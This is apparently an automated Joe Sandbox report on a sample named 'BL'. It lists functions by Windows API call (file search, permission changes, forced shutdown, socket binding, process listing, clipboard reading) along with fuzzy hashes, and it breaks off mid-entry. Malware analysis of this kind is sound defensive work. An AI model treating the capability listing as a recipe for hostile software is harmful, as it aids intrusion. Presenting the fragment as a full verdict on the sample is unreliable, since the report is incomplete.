                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Timetime$Sleep
                                                                                                                            • String ID: BUTTON
                                                                                                                            • API String ID: 4176159691-3405671355
                                                                                                                            • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                            • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                            • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                            • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                            Function 00442E1F Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 134fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,76228FB0,76228FB0,?,?,00000000), ref: 00442E40
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                                              • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,76233220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                            • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                            • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                                            • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                                            • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                                            Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                              • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                              • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                              • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                            • _memset.LIBCMT ref: 00445E61
                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                            • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                            • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                            • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                            • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3490752873-0
                                                                                                                            • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                            • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                            • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                            • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                            Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                            • _memset.LIBCMT ref: 0047AB7C
                                                                                                                            • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                            • _memset.LIBCMT ref: 0047ACCD
                                                                                                                            • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                            • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                            Strings
                                                                                                                            • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                            • API String ID: 1588287285-2785691316
                                                                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                            Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 2938487562-3733053543
                                                                                                                            • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                            • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                            • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                            • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                            Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __swprintf.LIBCMT ref: 00436162
                                                                                                                            • __swprintf.LIBCMT ref: 00436176
                                                                                                                              • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                            • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2406429042-0
                                                                                                                            • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                            • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                            • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                            • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                            Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                            • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                            • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                            • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                            • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                            • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                            Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 1915432386-2761332787
                                                                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                            Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DEFINE$`$h$h
                                                                                                                            • API String ID: 0-4194577831
                                                                                                                            • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                            • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                            • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                            • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                            Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                            • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2609815416-0
                                                                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                            Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2547909840-0
                                                                                                                            • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                            • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                            • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                            • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                            Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                            • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                            • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 2693929171-438819550
                                                                                                                            • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                            • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                            • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                            • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                            Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
